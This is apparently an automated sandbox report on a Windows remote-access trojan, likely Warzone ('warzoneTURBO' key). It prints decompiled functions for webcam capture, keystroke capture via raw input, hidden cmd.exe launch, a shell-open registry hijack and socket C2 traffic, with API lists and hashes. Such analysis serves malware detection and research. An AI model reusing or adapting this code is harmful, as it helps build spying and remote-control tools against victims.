											E00414492( &_v200);
											_t107 = _a4;
											E00414AD1(_t76, _v132 + 0x30, _t107, _v44, _v48, _v38);
											E00405DE9(_t76 & 0xffffff00 | _t107 -  *((intOrPtr*)(_t76 + 0xc)) > 0x00000000);
											_t91 = 7;
											memcpy(_t121 + 0xc - 0x1c,  *( *((intOrPtr*)(_t76 + 4)) + _t107 * 4), _t91 << 2);
											E0041457F( *_t76);
											_t49 = E0041462F();
											 *((intOrPtr*)(_t76 + 0x30)) = _t49;
											if(_t49 != 0) {
												_t71 =  *((intOrPtr*)(_t76 + 0x18));
												 *((intOrPtr*)( *_t71 + 0x24))(_t71,  *_t76, 0);
												_t96 =  *((intOrPtr*)(_t76 + 0x24));
												_t118 = _t76 + 0x34;
												_t49 =  *((intOrPtr*)( *_t96))(_t96, 0x4175e0, _t118);
												_t97 =  *_t118;
												if(_t97 != 0) {
													return  *((intOrPtr*)( *_t97 + 0x1c))(_t97);
												}
											}
										}
									}
								}
							}
						}
					}
				}
				return _t49;
			}
































                                  0x00414cbf
                                  0x00414cc1
                                  0x00414cc7
                                  0x00414cd9
                                  0x00414cdf
                                  0x00414ce3
                                  0x00414ceb
                                  0x00414cf5
                                  0x00414cf7
                                  0x00414cfb
                                  0x00414d04
                                  0x00414d07
                                  0x00414d0c
                                  0x00414d13
                                  0x00414d13
                                  0x00414d1b
                                  0x00414d21
                                  0x00414d33
                                  0x00414d39
                                  0x00414d3d
                                  0x00414d4e
                                  0x00414d51
                                  0x00414d5d
                                  0x00414d68
                                  0x00414d72
                                  0x00414d78
                                  0x00414d7e
                                  0x00414d81
                                  0x00414d82
                                  0x00414d83
                                  0x00414d8c
                                  0x00414d8d
                                  0x00414d8e
                                  0x00414d8f
                                  0x00414d92
                                  0x00414d98
                                  0x00414d9d
                                  0x00414da2
                                  0x00414dab
                                  0x00414db0
                                  0x00414db5
                                  0x00414dbb
                                  0x00414dc5
                                  0x00414dca
                                  0x00414dd0
                                  0x00414ddd
                                  0x00414df2
                                  0x00414e00
                                  0x00414e08
                                  0x00414e14
                                  0x00414e1f
                                  0x00414e2f
                                  0x00414e32
                                  0x00414e36
                                  0x00414e3e
                                  0x00414e43
                                  0x00414e48
                                  0x00414e4a
                                  0x00414e54
                                  0x00414e57
                                  0x00414e5a
                                  0x00414e66
                                  0x00414e68
                                  0x00414e6c
                                  0x00000000
                                  0x00414e71
                                  0x00414e6c
                                  0x00414e48
                                  0x00414dca
                                  0x00414db5
                                  0x00414da2
                                  0x00414d3d
                                  0x00414d1b
                                  0x00414cfb
                                  0x00414e78

                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 00414CC1
                                  • CoCreateInstance.OLE32(004175C0,00000000,00000001,0041A79C,?), ref: 00414CD9
                                  • CoCreateInstance.OLE32(00417610,00000000,00000001,0041A78C,?), ref: 00414D33
                                    • Part of subcall function 00414A12: CoCreateInstance.OLE32(00417600,00000000,00000001,0041A77C,?), ref: 00414A40
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInstance$Initialize
                                  • String ID: Grabber$Source$vids
                                  • API String ID: 1108742289-4200688928
                                  • Opcode ID: a8aeeb8cf2cab8e24f88fce5b960f0a0a2b9a748dd8ec08587ead78164211a85
                                  • Instruction ID: c707b6f7033061667e34d12cbb2bfaee6e47a2410d4a0b7bdeab57eb5d8e2362
                                  • Opcode Fuzzy Hash: a8aeeb8cf2cab8e24f88fce5b960f0a0a2b9a748dd8ec08587ead78164211a85
                                  • Instruction Fuzzy Hash: 1C518A71600200AFDF14DF64C885E9A3BB6BF89715B2041ADFD05AF291CB79ED85CB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00407A8E, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64sleepprocessmemoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 64%
                                  			E00407A8E(void* __eflags) {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOA _v100;
				CHAR* _t27;

				_v8 = 0;
				E00410CFF( &_v8);
				_t27 = VirtualAlloc(0, 0xff, 0x1000, 0x40);
				GetWindowsDirectoryA(_t27, 0x104);
				E0040102C( &(_t27[lstrlenA(_t27)]), "\\System32\\cmd.exe", 0x14);
				E00401052( &_v100, 0, 0x44);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreateProcessA(_t27, 0, 0, 0, 0, 0x8000000, 0, 0,  &_v100,  &_v24) == 0) {
					return E00410CD8(_v8);
				}
				Sleep(0x3e8);
				return _v24.dwProcessId;
			}







                                  0x00407a9c
                                  0x00407a9f
                                  0x00407ab7
                                  0x00407abf
                                  0x00407ad6
                                  0x00407ae2
                                  0x00407aec
                                  0x00407af0
                                  0x00407af1
                                  0x00407af2
                                  0x00407b0f
                                  0x00000000
                                  0x00407b24
                                  0x00407b16
                                  0x00000000

                                  APIs
                                  • VirtualAlloc.KERNEL32(00000000,000000FF,00001000,00000040,00000000,?,?), ref: 00407AB1
                                  • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00407ABF
                                  • lstrlenA.KERNEL32(00000000,\System32\cmd.exe,00000014), ref: 00407ACD
                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 00407B07
                                  • Sleep.KERNEL32(000003E8), ref: 00407B16
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AllocCreateDirectoryProcessSleepVirtualWindowslstrlen
                                  • String ID: \System32\cmd.exe
                                  • API String ID: 2560724043-2003734499
                                  • Opcode ID: b3de0a5e209d2120b9e275e8d83ec7119fedad0186483f74c4aeae4fe557b3e5
                                  • Instruction ID: 526d35256bd352fe19e6f9b51bef16261156da3b9883bb0cb5aadd8e9d8f3863
                                  • Opcode Fuzzy Hash: b3de0a5e209d2120b9e275e8d83ec7119fedad0186483f74c4aeae4fe557b3e5
                                  • Instruction Fuzzy Hash: E51170B1A4430DBBE710A7A9CC86FEF767CEB04748F000036F206B6191DA74AE0586A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040906F, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040906F(char _a4, intOrPtr _a8) {
				void _v28;
				void* _t13;
				signed int _t14;

				InitializeCriticalSection( &_v28);
				_t14 = 6;
				DeleteCriticalSection(memcpy(0x55a808,  &_v28, _t14 << 2));
				EnterCriticalSection(0x55a808);
				_t5 =  &_a4; // 0x402f48
				 *0x55a830 =  *_t5;
				GetModuleHandleA(0);
				 *0x42675c = 0x559de0;
				if(_a8 == 0) {
					E00401F98(0x55a854);
					 *0x559de0 = 1;
					_t13 = E00401F6D(0x55a84c, E00408D0F, 0x559de0);
				} else {
					_t13 = E00401F6D(0x55a854, E00407F94, 0x559de0);
					 *0x55a7f4 = 1;
				}
				LeaveCriticalSection(0x55a808);
				return _t13;
			}






                                  0x0040907b
                                  0x00409083
                                  0x00409092
                                  0x0040909e
                                  0x004090a4
                                  0x004090a9
                                  0x004090ae
                                  0x004090bd
                                  0x004090c8
                                  0x004090e1
                                  0x004090f1
                                  0x004090fb
                                  0x004090ca
                                  0x004090d0
                                  0x004090d5
                                  0x004090d5
                                  0x00409101
                                  0x0040910a

                                  APIs
                                  • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040907B
                                  • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 00409092
                                  • EnterCriticalSection.KERNEL32(0055A808,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 0040909E
                                  • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,00402F48,?,00000001,?,?), ref: 004090AE
                                  • LeaveCriticalSection.KERNEL32(0055A808,?,00000000), ref: 00409101
                                    • Part of subcall function 00401F6D: CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 00401F82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
                                  • String ID: H/@
                                  • API String ID: 2964645253-3842538647
                                  • Opcode ID: 7251a566045f706d7ca5ef1436c7077981233550bcd5c9d1227c9b9e5285168c
                                  • Instruction ID: f99a12277a3120933ea65728b4e70e144b28dbd7bebc7df26f1967f06ae464e9
                                  • Opcode Fuzzy Hash: 7251a566045f706d7ca5ef1436c7077981233550bcd5c9d1227c9b9e5285168c
                                  • Instruction Fuzzy Hash: 9D017131A04205ABCB10AB65EC19BDB3FB9FB44716F00413BFA05A72D1C779544ACB96
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040910D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 38libraryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 79%
                                  			E0040910D() {
				intOrPtr _t1;

				_t1 = 5;
				 *0x55a804 = _t1;
				 *0x559dec = 0;
				 *0x55a7fc = _t1;
				 *0x55a800 = 0;
				E004018C7(0x55a7f8, 0);
				InitializeCriticalSection(0x55a808);
				E004113ED(0x55a834, 0);
				asm("xorps xmm0, xmm0");
				 *0x55a820 = 0;
				asm("movups [0x55a84c], xmm0");
				 *0x55a830 = 0;
				_t19 = LoadLibraryW(L"User32.dll");
				_push(0x55a834);
				 *0x55a824 = E00411E88(_t4, "GetRawInputData", 0);
				 *0x55a82c = E00411E88(_t19, "ToUnicode", 0);
				 *0x55a828 = E00411E88(_t19, "MapVirtualKeyA", 0);
				return 0x559de0;
			}




                                  0x00409110
                                  0x00409113
                                  0x0040911d
                                  0x00409123
                                  0x00409128
                                  0x0040912e
                                  0x00409138
                                  0x00409143
                                  0x00409148
                                  0x0040914b
                                  0x00409156
                                  0x0040915d
                                  0x00409169
                                  0x00409170
                                  0x0040917d
                                  0x0040918e
                                  0x0040919b
                                  0x004091a6

                                  APIs
                                  • InitializeCriticalSection.KERNEL32(0055A808,?,00401251), ref: 00409138
                                  • LoadLibraryW.KERNEL32(User32.dll,?,00401251), ref: 00409163
                                    • Part of subcall function 00411E88: lstrcmpA.KERNEL32(?,Q2A,?,open,00413251), ref: 00411EC1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalInitializeLibraryLoadSectionlstrcmp
                                  • String ID: GetRawInputData$MapVirtualKeyA$ToUnicode$User32.dll
                                  • API String ID: 4274177235-2474467583
                                  • Opcode ID: 722d443ab0ccf9adfafb109646b35116b9ee6f38e4403bfd207fed41f56d27f2
                                  • Instruction ID: d1db26310c3b7d33376476d0bb5eea29622b7161c180695f05f3ce86934a789e
                                  • Opcode Fuzzy Hash: 722d443ab0ccf9adfafb109646b35116b9ee6f38e4403bfd207fed41f56d27f2
                                  • Instruction Fuzzy Hash: 980144B16643504B8700AB697C255693EF1FB9D702310832FE90497360E73809CBDB8E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412E2C, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 38registrystringCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 73%
                                  			E00412E2C(void* __ecx, char* _a4, CHAR* _a8) {
				void* _v8;
				long _t9;
				int _t12;
				int _t15;
				long _t16;

				_t15 = lstrlenA(_a8);
				_t9 = RegOpenKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0x20006,  &_v8);
				if(_t9 == 0) {
					_t16 = RegSetValueExA(_v8, _a4, 0, 1, _a8, _t15);
					RegCloseKey(_v8);
					if(_t16 == 0) {
						_t12 = 1;
					} else {
						_push(_t16);
						goto L2;
					}
				} else {
					_push(_t9);
					L2:
					SetLastError();
					_t12 = 0;
				}
				return _t12;
			}








                                  0x00412e3a
                                  0x00412e51
                                  0x00412e59
                                  0x00412e7d
                                  0x00412e7f
                                  0x00412e87
                                  0x00412e8c
                                  0x00412e89
                                  0x00412e89
                                  0x00000000
                                  0x00412e89
                                  0x00412e5b
                                  0x00412e5b
                                  0x00412e5c
                                  0x00412e5c
                                  0x00412e62
                                  0x00412e62
                                  0x00412e90

                                  APIs
                                  • lstrlenA.KERNEL32(004131BE,00418FE6,?,?,004131BE,00418FE6,?), ref: 00412E34
                                  • RegOpenKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00020006,?,?,?,004131BE,00418FE6,?), ref: 00412E51
                                  • SetLastError.KERNEL32(00000000,?,?,004131BE,00418FE6,?), ref: 00412E5C
                                  • RegSetValueExA.ADVAPI32(?,00418FE6,00000000,00000001,004131BE,00000000,?,?,004131BE,00418FE6,?), ref: 00412E74
                                  • RegCloseKey.ADVAPI32(?,?,?,004131BE,00418FE6,?), ref: 00412E7F
                                  Strings
                                  • Software\Classes\Folder\shell\open\command, xrefs: 00412E47
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: CloseErrorLastOpenValuelstrlen
                                  • String ID: Software\Classes\Folder\shell\open\command
                                  • API String ID: 1613093083-2536721355
                                  • Opcode ID: 31a94de38354eca2784d2d112a83c47bf72bfd193ace401840464e10e3bc09ab
                                  • Instruction ID: ffd4354489f07140ccd769c490119bd97119082caabcfac067ebab19d0d729b9
                                  • Opcode Fuzzy Hash: 31a94de38354eca2784d2d112a83c47bf72bfd193ace401840464e10e3bc09ab
                                  • Instruction Fuzzy Hash: 0BF0CD35540318BBDF211FA09D09FDB3F79AB09790F108160F902A6160C2B58A61ABA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F238, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 50%
                                  			E0040F238(intOrPtr _a4) {
				intOrPtr* _t2;
				_Unknown_base(*)()* _t8;
				struct HINSTANCE__* _t10;

				_t2 =  *0x55adb8;
				if(_t2 == 0) {
					L2:
					_t10 = GetModuleHandleW(L"ntdll.dll");
					 *0x55adb8 = GetProcAddress(_t10, "RtlNtStatusToDosError");
					_t8 = GetProcAddress(_t10, "RtlSetLastWin32Error");
					_t2 =  *0x55adb8;
					 *0x55ad94 = _t8;
				} else {
					_t8 =  *0x55ad94;
					if(_t8 == 0) {
						goto L2;
					}
				}
				if(_t2 != 0 && _t8 != 0) {
					return  *0x55ad94( *_t2(_a4));
				}
				return _t2;
			}






                                  0x0040f23b
                                  0x0040f242
                                  0x0040f24e
                                  0x0040f25a
                                  0x0040f26e
                                  0x0040f279
                                  0x0040f27b
                                  0x0040f280
                                  0x0040f244
                                  0x0040f244
                                  0x0040f24c
                                  0x00000000
                                  0x00000000
                                  0x0040f24c
                                  0x0040f289
                                  0x00000000
                                  0x0040f295
                                  0x0040f29c

                                  APIs
                                  • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,0040FC57,00000000), ref: 0040F254
                                  • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError,?,0040FC57,00000000), ref: 0040F262
                                  • GetProcAddress.KERNEL32(00000000,RtlSetLastWin32Error,?,0040FC57,00000000), ref: 0040F273
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$HandleModule
                                  • String ID: RtlNtStatusToDosError$RtlSetLastWin32Error$ntdll.dll
                                  • API String ID: 667068680-2897241497
                                  • Opcode ID: 6eed301b0b0b6b1f2085c8ee6f635985884be4a7adf6b0daa38cad27219b9fb4
                                  • Instruction ID: fa32091ee75a1baed7f6170c370dd1564c17c489402f95e3a669c5805b8ffe79
                                  • Opcode Fuzzy Hash: 6eed301b0b0b6b1f2085c8ee6f635985884be4a7adf6b0daa38cad27219b9fb4
                                  • Instruction Fuzzy Hash: F6F0B4342443005FDB106F64FC289BA3BB8AE94B53300013EF806D3B60DB79DC499A19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040594B, Relevance: 9.1, APIs: 6, Instructions: 75networksynchronizationCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 37%
                                  			E0040594B(void* __ecx, void* __eflags, char _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v28;
				intOrPtr _v32;
				void _v40;
				void* _t36;
				signed int _t40;
				signed int _t42;
				void* _t44;
				signed int _t47;
				intOrPtr _t53;
				intOrPtr _t54;
				signed int* _t55;

				_v8 = _v8 & 0x00000000;
				_t44 = __ecx;
				E00403237(__ecx,  &_a4);
				 *((intOrPtr*)(_t44 + 4)) = _a8;
				E0041178E(_t44 + 0x1d8);
				_t47 = 8;
				memset( &_v40, 0, _t47 << 2);
				_v28 = 6;
				_t36 =  &_v40;
				_t53 = 1;
				_v32 = 1;
				__imp__getaddrinfo(_a4, 0, _t36,  &_v8);
				if(_t36 != 0) {
					L4:
					_t53 = 0;
				} else {
					_t54 =  *((intOrPtr*)(_v8 + 0x18));
					_t40 = 2;
					__imp__#23(_t40, 1, 0);
					 *(_t44 + 0xc) = _t40;
					if(_t40 == 0xffffffff) {
						goto L4;
					} else {
						_t55 = _t44 + 0x1c8;
						 *((intOrPtr*)(_t44 + 0x1cc)) =  *((intOrPtr*)(_t54 + 4));
						_t42 = 2;
						 *_t55 = _t42;
						__imp__#9(_a8);
						 *(_t44 + 0x1ca) = _t42;
						__imp__freeaddrinfo(_v8);
						__imp__#4( *(_t44 + 0xc), _t55, 0x10);
						if(_t42 != 0xffffffff) {
							 *((intOrPtr*)(_t44 + 8)) = 1;
							ReleaseMutex( *(_t44 + 0x1d8));
						} else {
							 *(_t44 + 0xc) =  *(_t44 + 0xc) | _t42;
							goto L4;
						}
					}
				}
				E00405FEB(_a4);
				return _t53;
			}















                                  0x00405951
                                  0x0040595c
                                  0x0040595e
                                  0x0040596c
                                  0x0040596f
                                  0x00405976
                                  0x0040597c
                                  0x00405981
                                  0x00405989
                                  0x00405994
                                  0x00405995
                                  0x00405998
                                  0x004059a0
                                  0x004059ff
                                  0x004059ff
                                  0x004059a2
                                  0x004059aa
                                  0x004059ad
                                  0x004059af
                                  0x004059b5
                                  0x004059bb
                                  0x00000000
                                  0x004059bd
                                  0x004059c0
                                  0x004059c8
                                  0x004059ce
                                  0x004059d2
                                  0x004059d5
                                  0x004059de
                                  0x004059e5
                                  0x004059f1
                                  0x004059fa
                                  0x00405a18
                                  0x00405a1b
                                  0x004059fc
                                  0x004059fc
                                  0x00000000
                                  0x004059fc
                                  0x004059fa
                                  0x004059bb
                                  0x00405a04
                                  0x00405a0f

                                  APIs
                                    • Part of subcall function 00403237: lstrcatA.KERNEL32(00000000,74A313FB,?,00000000,?,004036D6,00000000,00000000,?,00404FB1,?,?,?,?,?,00000000), ref: 00403263
                                    • Part of subcall function 0041178E: WaitForSingleObject.KERNEL32(?,000000FF,00405974,74A313FB,?,?,00000000,00404FB9,?,?,?,?,?,00000000,74A313FB), ref: 00411792
                                  • getaddrinfo.WS2_32(74A313FB,00000000,00404FB9,00000000), ref: 00405998
                                  • socket.WS2_32(00000002,00000001,00000000), ref: 004059AF
                                  • htons.WS2_32(00000000), ref: 004059D5
                                  • freeaddrinfo.WS2_32(00000000), ref: 004059E5
                                  • connect.WS2_32(?,?,00000010), ref: 004059F1
                                  • ReleaseMutex.KERNEL32(?), ref: 00405A1B
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: MutexObjectReleaseSingleWaitconnectfreeaddrinfogetaddrinfohtonslstrcatsocket
                                  • String ID:
                                  • API String ID: 2516106447-0
                                  • Opcode ID: c258d490acdb0b488783c694752f3a28ef6200513261933e4d17fdd22df78f8b
                                  • Instruction ID: 9847916f8b98b7b597607d954632222e8a2bcfa95c272735c2b26949272ee6fd
                                  • Opcode Fuzzy Hash: c258d490acdb0b488783c694752f3a28ef6200513261933e4d17fdd22df78f8b
                                  • Instruction Fuzzy Hash: DD219C71A00208ABDF10DF65CC88BDA7BB9EF44324F10856AFD19EB2A1D7359A41DF64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040C30D, Relevance: 9.1, APIs: 6, Instructions: 73filememoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E0040C30D(WCHAR* __ecx, void** __edx, long* _a4) {
				void** _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				long* _t14;
				long _t16;
				void* _t17;
				long* _t24;
				void* _t32;
				struct _OVERLAPPED* _t34;
				void* _t36;

				_t34 = 0;
				_v8 = __edx;
				_t36 =  *0x42696c - _t34; // 0x0
				if(_t36 == 0) {
					_t32 = CreateFileW(__ecx, 0x80000000, 3, 0, 3, 0, 0);
					if(_t32 != 0 && _t32 != 0xffffffff) {
						_t14 =  &_v20;
						__imp__GetFileSizeEx(_t32, _t14);
						if(_t14 != 0 && _v16 == 0) {
							_t16 = _v20;
							_t24 = _a4;
							 *_t24 = _t16;
							_t17 = LocalAlloc(0x40, _t16);
							 *_v8 = _t17;
							if(_t17 != 0) {
								if(ReadFile(_t32, _t17,  *_t24,  &_v12, 0) == 0 ||  *_t24 != _v12) {
									LocalFree( *_v8);
								} else {
									_t34 = 1;
								}
							}
						}
						CloseHandle(_t32);
					}
				} else {
					_t34 = E0040C3B9(__ecx, __edx, _a4);
				}
				return _t34;
			}














                                  0x0040c314
                                  0x0040c318
                                  0x0040c31b
                                  0x0040c321
                                  0x0040c347
                                  0x0040c34b
                                  0x0040c352
                                  0x0040c357
                                  0x0040c35f
                                  0x0040c366
                                  0x0040c36a
                                  0x0040c370
                                  0x0040c372
                                  0x0040c37b
                                  0x0040c37f
                                  0x0040c392
                                  0x0040c3a5
                                  0x0040c39b
                                  0x0040c39d
                                  0x0040c39d
                                  0x0040c392
                                  0x0040c3ab
                                  0x0040c3ad
                                  0x0040c3ad
                                  0x0040c323
                                  0x0040c32c
                                  0x0040c32c
                                  0x0040c3b8

                                  APIs
                                  • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040C341
                                  • GetFileSizeEx.KERNEL32(00000000,?,?,00000000,?), ref: 0040C357
                                  • LocalAlloc.KERNEL32(00000040,?,?,?,00000000,?), ref: 0040C372
                                  • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 0040C38A
                                  • CloseHandle.KERNEL32(00000000), ref: 0040C3AD
                                    • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3D8
                                    • Part of subcall function 0040C3B9: LocalAlloc.KERNEL32(00000040,?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C3E6
                                    • Part of subcall function 0040C3B9: CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040C3FC
                                    • Part of subcall function 0040C3B9: LocalFree.KERNEL32(?,?,0040C32B,?,00000000,?,00000000,?), ref: 0040C40A
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: FileLocal$AllocBinaryCryptString$CloseCreateFreeHandleReadSize
                                  • String ID:
                                  • API String ID: 4225742195-0
                                  • Opcode ID: 7808e07875b2e4740a3c85fc7c8b99c4ce96716a74113defd5bd93085088574c
                                  • Instruction ID: 02c412f26371b87ae011b2f5e9937fc2d134ed4a40de9b12e1d11bca91295adc
                                  • Opcode Fuzzy Hash: 7808e07875b2e4740a3c85fc7c8b99c4ce96716a74113defd5bd93085088574c
                                  • Instruction Fuzzy Hash: 3D119371610214EBCB219B65DC84AAF7BB8EF49750B10827AFD01E6290D7389D01CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040577F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 84%
                                  			E0040577F(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v36;
				char _v44;
				char _v52;
				char _v56;
				char _v60;
				char _v65600;
				void* _t47;
				char* _t54;
				intOrPtr _t79;
				void* _t85;
				void* _t88;
				void* _t89;
				void* _t114;
				char* _t115;
				char _t117;
				void* _t118;
				void* _t119;
				void* _t120;

				_t114 = __edx;
				_t89 = __ecx;
				_t47 = E004011C0(0x10040, __ecx);
				_t88 = _t89;
				if( *((intOrPtr*)(_t88 + 0xc)) != 0xffffffff) {
					_v28 = 0xea60;
					__imp__#21( *((intOrPtr*)(_t88 + 0xc)), 0xffff, 0x1006,  &_v28, 4);
					_t117 = 0;
					E00401052( &_v65600, 0, 0xffff);
					_t120 = _t119 + 0xc;
					_v60 = 0;
					_v56 = 0;
					E00403115( &_v52, _t114, E004034D1( &_v12, "warzoneTURBO"));
					E00405FEB(_v12);
					_v24 = 0;
					_v20 = 0;
					while(1) {
						_t54 =  &_v65600;
						__imp__#16( *((intOrPtr*)(_t88 + 0xc)), _t54, 0xc, _t117);
						_t115 = _t54;
						if(_t115 != 0xc) {
							goto L8;
						}
						_v16 = _t117;
						_t106 =  &_v16;
						_v12 = _t117;
						E004030CC( &_v16,  &_v65600, _t54);
						_t107 = _t120;
						E0040315E(_t120,  &_v16);
						E0040315E(_t120,  &_v52);
						E004061F0( &_v44, _t114, _t120, _t107,  &_v16, _t106);
						_t120 = _t120 + 0x10;
						_t79 =  *((intOrPtr*)(_v44 + 4));
						_t118 = _t79 + 0xc;
						if(_t79 == 0 || _t118 == _t115) {
							L7:
							E00403148( &_v44);
							E00403148( &_v16);
							L9:
							_t96 =  &_v24;
							E004030CC( &_v24,  &_v65600, _t115);
							_t97 = _t120;
							E0040315E(_t120,  &_v24);
							E0040315E(_t120,  &_v52);
							E004061F0( &_v36, _t114, _t120, _t97,  &_v24, _t96);
							_t120 = _t120 + 0x10;
							E004030FE(_t88 + 0x10);
							E004030CC(_t88 + 0x10, _v36, _t115);
							E004030FE( &_v24);
							E004030FE( &_v36);
							E0040507E(_t88, _t114, _a4);
							E00403148( &_v36);
							if(_t115 <= 0) {
								goto L12;
							}
							_t117 = 0;
							continue;
						} else {
							while(1) {
								_t85 =  &_v65600 + _t115;
								__imp__#16( *((intOrPtr*)(_t88 + 0xc)), _t85, _t118 - _t115, 0);
								if(_t85 == 0xffffffff) {
									break;
								}
								_t115 = _t115 + _t85;
								if(_t118 != _t115) {
									continue;
								}
								goto L7;
							}
							E00403148( &_v44);
							E00403148( &_v16);
							L12:
							E00403148( &_v24);
							E00403148( &_v52);
							return E00403148( &_v60);
						}
						L8:
						if(_t115 == 0xffffffff) {
							goto L12;
						}
						goto L9;
					}
				}
				return _t47;
			}


























                                  0x0040577f
                                  0x0040577f
                                  0x00405787
                                  0x0040578d
                                  0x00405795
                                  0x004057a0
                                  0x004057b6
                                  0x004057bd
                                  0x004057c7
                                  0x004057cc
                                  0x004057cf
                                  0x004057d5
                                  0x004057e6
                                  0x004057ee
                                  0x004057f3
                                  0x004057f6
                                  0x004057f9
                                  0x004057fc
                                  0x00405806
                                  0x0040580c
                                  0x00405811
                                  0x00000000
                                  0x00000000
                                  0x0040581e
                                  0x00405822
                                  0x00405825
                                  0x00405828
                                  0x00405832
                                  0x00405835
                                  0x00405842
                                  0x0040584a
                                  0x00405852
                                  0x00405855
                                  0x00405858
                                  0x0040585d
                                  0x0040588b
                                  0x0040588e
                                  0x00405896
                                  0x004058a6
                                  0x004058ae
                                  0x004058b1
                                  0x004058bb
                                  0x004058be
                                  0x004058cb
                                  0x004058d3
                                  0x004058d8
                                  0x004058de
                                  0x004058ea
                                  0x004058f2
                                  0x004058fa
                                  0x00405904
                                  0x0040590c
                                  0x00405913
                                  0x00000000
                                  0x00000000
                                  0x00405915
                                  0x00000000
                                  0x00405863
                                  0x00405863
                                  0x00405870
                                  0x00405876
                                  0x0040587f
                                  0x00000000
                                  0x00000000
                                  0x00405885
                                  0x00405889
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00405889
                                  0x0040591f
                                  0x00405927
                                  0x0040592c
                                  0x0040592f
                                  0x00405937
                                  0x00000000
                                  0x0040593f
                                  0x0040589d
                                  0x004058a0
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x004058a0
                                  0x004057f9
                                  0x00405948

                                  APIs
                                  • setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 004057B6
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,74A313FB,?,00405B8D,.bss,00000000), ref: 004034DA
                                    • Part of subcall function 004034D1: lstrlenA.KERNEL32(?,?,00405B8D,.bss,00000000), ref: 004034E7
                                    • Part of subcall function 004034D1: lstrcpyA.KERNEL32(00000000,?,?,00405B8D,.bss,00000000), ref: 004034FA
